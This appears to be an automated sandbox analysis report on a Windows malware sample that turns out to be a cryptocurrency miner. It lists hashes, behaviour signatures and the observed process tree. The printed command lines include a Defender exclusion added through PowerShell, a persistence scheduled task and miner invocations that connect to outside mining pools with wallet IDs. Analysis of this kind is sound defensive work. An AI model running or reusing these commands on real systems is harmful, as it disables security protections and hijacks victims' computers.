Analysis
-
max time kernel
106s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
17-09-2022 08:30
Static task
static1
Behavioral task
behavioral1
Sample
cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe
Resource
win10v2004-20220812-en
General
-
Target
cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe
-
Size
862KB
-
MD5
a69b4b080114c6c20c5471ad5613e3bf
-
SHA1
e2bff2d6b4e3742e5f88b54285abe2286742257a
-
SHA256
cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c
-
SHA512
c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137
-
SSDEEP
6144:7lwUrVjuSJHQ7ngOzI53XvrxC8e7IDnUc5D8pDF8Z5+ECLsrski+xk30+TeE0Hu0:LVRQgDzxCUFM55sXi/00f70us
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 824 DHUZT.exe -
resource yara_rule behavioral1/memory/4904-159-0x0000000140000000-0x0000000142EFE000-memory.dmp upx behavioral1/memory/4904-161-0x0000000140000000-0x0000000142EFE000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation DHUZT.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 824 set thread context of 2976 824 DHUZT.exe 95 PID 824 set thread context of 4904 824 DHUZT.exe 101 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4736 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1608 timeout.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4060 powershell.exe 4060 powershell.exe 5008 powershell.exe 5008 powershell.exe 824 DHUZT.exe 824 DHUZT.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4992 cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe Token: SeDebugPrivilege 4060 powershell.exe Token: SeDebugPrivilege 824 DHUZT.exe Token: SeDebugPrivilege 5008 powershell.exe -
Suspicious use of WriteProcessMemory 37 IoCs
description pid Process procid_target PID 4992 wrote to memory of 4060 4992 cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe 80 PID 4992 wrote to memory of 4060 4992 cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe 80 PID 4992 wrote to memory of 4076 4992 cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe 82 PID 4992 wrote to memory of 4076 4992 cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe 82 PID 4076 wrote to memory of 1608 4076 cmd.exe 84 PID 4076 wrote to memory of 1608 4076 cmd.exe 84 PID 4076 wrote to memory of 824 4076 cmd.exe 85 PID 4076 wrote to memory of 824 4076 cmd.exe 85 PID 824 wrote to memory of 5008 824 DHUZT.exe 86 PID 824 wrote to memory of 5008 824 DHUZT.exe 86 PID 824 wrote to memory of 1028 824 DHUZT.exe 88 PID 824 wrote to memory of 1028 824 DHUZT.exe 88 PID 1028 wrote to memory of 4736 1028 cmd.exe 90 PID 1028 wrote to memory of 4736 1028 cmd.exe 90 PID 824 wrote to memory of 2976 824 DHUZT.exe 95 PID 824 wrote to memory of 2976 824 DHUZT.exe 95 PID 824 wrote to memory of 2976 824 DHUZT.exe 95 PID 824 wrote to memory of 2976 824 DHUZT.exe 95 PID 824 wrote to memory of 2976 824 DHUZT.exe 95 PID 824 wrote to memory of 2976 824 DHUZT.exe 95 PID 824 wrote to memory of 2976 824 DHUZT.exe 95 PID 824 wrote to memory of 2976 824 DHUZT.exe 95 PID 824 wrote to memory of 2976 824 DHUZT.exe 95 PID 824 wrote to memory of 2976 824 DHUZT.exe 95 PID 824 wrote to memory of 2976 824 DHUZT.exe 95 PID 824 wrote to memory of 2976 824 DHUZT.exe 95 PID 824 wrote to memory of 2976 824 DHUZT.exe 95 PID 824 wrote to memory of 2976 824 DHUZT.exe 95 PID 2976 wrote to memory of 3688 2976 vbc.exe 96 PID 2976 wrote to memory of 3688 2976 vbc.exe 96 PID 824 wrote to memory of 4904 824 DHUZT.exe 101 PID 824 wrote to memory of 4904 824 DHUZT.exe 101 PID 824 wrote to memory of 4904 824 DHUZT.exe 101 PID 824 wrote to memory of 4904 824 DHUZT.exe 101 PID 824 wrote to memory of 4904 824 DHUZT.exe 101 PID 824 wrote to memory of 4904 824 DHUZT.exe 101 PID 824 wrote to memory of 4904 824 DHUZT.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe"C:\Users\Admin\AppData\Local\Temp\cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6D16.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:1608
-
-
C:\ProgramData\ccl\DHUZT.exe"C:\ProgramData\ccl\DHUZT.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5008
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"5⤵
- Creates scheduled task(s)
PID:4736
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.NewWorker -p x -t 74⤵
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls5⤵PID:3688
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --user t1fd8D4s9ZYr87E5HaqJJehhTWq5G4A5X2z.APOCALYPSE --port 2001 --pool us-flux.fluxpools.net --pass x --coin flux4⤵PID:4904
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
862KB
MD5a69b4b080114c6c20c5471ad5613e3bf
SHA1e2bff2d6b4e3742e5f88b54285abe2286742257a
SHA256cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c
SHA512c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137
-
Filesize
862KB
MD5a69b4b080114c6c20c5471ad5613e3bf
SHA1e2bff2d6b4e3742e5f88b54285abe2286742257a
SHA256cd1f993ecd2d424f7516097869c2bb35e97ea61f03f2a70b0643b3fa58ce2c0c
SHA512c56960b4dd4f9a9ce114da597f2e3fca02d3a31df0599b2bde9e0eb61c7890e88c1573326616a307d711f54c3df959db7e2590805beee1a1174fe60f8fe94137
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
137B
MD5254752f83e957dff4ec87cc2d35e5e70
SHA12139b8885ef379ddaedd643f006bcf2e45dbae6e
SHA25621d9548ed4f1e7baae114bccd3c938bbb1271e0c643db2e4804b5d3a11db6b04
SHA51270547491276cdb7b83f542914fb08c6e6c5f155f107d9f3af38f52e8391c123c11a1bf44efa005eda071a5b63e1499e7fb2d0bd2257bfc1814c4082dc65c9275